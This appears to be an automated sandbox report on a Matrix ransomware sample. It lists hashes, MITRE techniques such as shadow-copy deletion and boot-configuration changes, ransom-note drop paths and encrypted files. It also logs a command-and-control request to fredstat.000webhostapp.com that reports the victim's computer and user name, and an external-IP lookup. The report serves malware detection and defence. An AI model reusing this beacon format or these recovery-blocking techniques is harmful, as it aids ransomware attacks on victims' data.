matrix | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5

Analysis

max time kernel
4294211s
max time network
127s
platform
windows7_x64
resource
win7-20220223-en
submitted
06-03-2022 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
Size

2.6MB
MD5

1f987de3da76b532d5eb4dc0a8e07edc
SHA1

2002718bb7d81d6661892c6f2631df27eac89f61
SHA256

72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5
SHA512

7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310

Score

10^/10

matrix discovery evasion persistence ransomware suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\MSBuild\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\1033\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\plugins\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
HTTP URL	6	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA\|Admin&sid=LQMmMFJj5SYKygNT&phase=14717138B485D1C3\|7177\|1GB	Process not Found
File created		C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\Default\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Recovery\5e26de02-94e2-11ec-89d5-a6ba382fb892\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Microsoft\Assistance\Client\1.0\ja-JP\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Users\Admin\Desktop\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created		C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
892	bcdedit.exe
1280	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
10	512	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	DhyQfpmw64.exe

Executes dropped EXE 3 IoCs

pid	Process
1624	NWSO8eY2.exe
1604	DhyQfpmw.exe
1684	DhyQfpmw64.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ConnectDeny.tiff	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000800000001232a-69.dat	upx
behavioral1/files/0x000800000001232a-68.dat	upx
behavioral1/files/0x000800000001232a-70.dat	upx

Loads dropped DLL 4 IoCs

pid	Process
756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
1600	cmd.exe
1604	DhyQfpmw.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1784	takeown.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	DhyQfpmw64.exe
File opened (read-only)	\??\B:	DhyQfpmw64.exe
File opened (read-only)	\??\K:	DhyQfpmw64.exe
File opened (read-only)	\??\M:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\U:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\T:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\K:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\H:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\F:	DhyQfpmw64.exe
File opened (read-only)	\??\H:	DhyQfpmw64.exe
File opened (read-only)	\??\Q:	DhyQfpmw64.exe
File opened (read-only)	\??\V:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\V:	DhyQfpmw64.exe
File opened (read-only)	\??\W:	DhyQfpmw64.exe
File opened (read-only)	\??\U:	DhyQfpmw64.exe
File opened (read-only)	\??\R:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\O:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\J:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\G:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\O:	DhyQfpmw64.exe
File opened (read-only)	\??\Y:	DhyQfpmw64.exe
File opened (read-only)	\??\Y:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\I:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\E:	DhyQfpmw64.exe
File opened (read-only)	\??\G:	DhyQfpmw64.exe
File opened (read-only)	\??\J:	DhyQfpmw64.exe
File opened (read-only)	\??\P:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\T:	DhyQfpmw64.exe
File opened (read-only)	\??\X:	DhyQfpmw64.exe
File opened (read-only)	\??\X:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\S:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\L:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\I:	DhyQfpmw64.exe
File opened (read-only)	\??\R:	DhyQfpmw64.exe
File opened (read-only)	\??\Z:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\Q:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\F:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\Z:	DhyQfpmw64.exe
File opened (read-only)	\??\W:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\E:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened (read-only)	\??\L:	DhyQfpmw64.exe
File opened (read-only)	\??\M:	DhyQfpmw64.exe
File opened (read-only)	\??\N:	DhyQfpmw64.exe
File opened (read-only)	\??\P:	DhyQfpmw64.exe
File opened (read-only)	\??\S:	DhyQfpmw64.exe
File opened (read-only)	\??\N:	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	myexternalip.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\3STAYjlo.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left_over.gif	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jsse.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\uk.pak	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jre7\lib\calendars.properties	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR21F.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.CN.XML	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
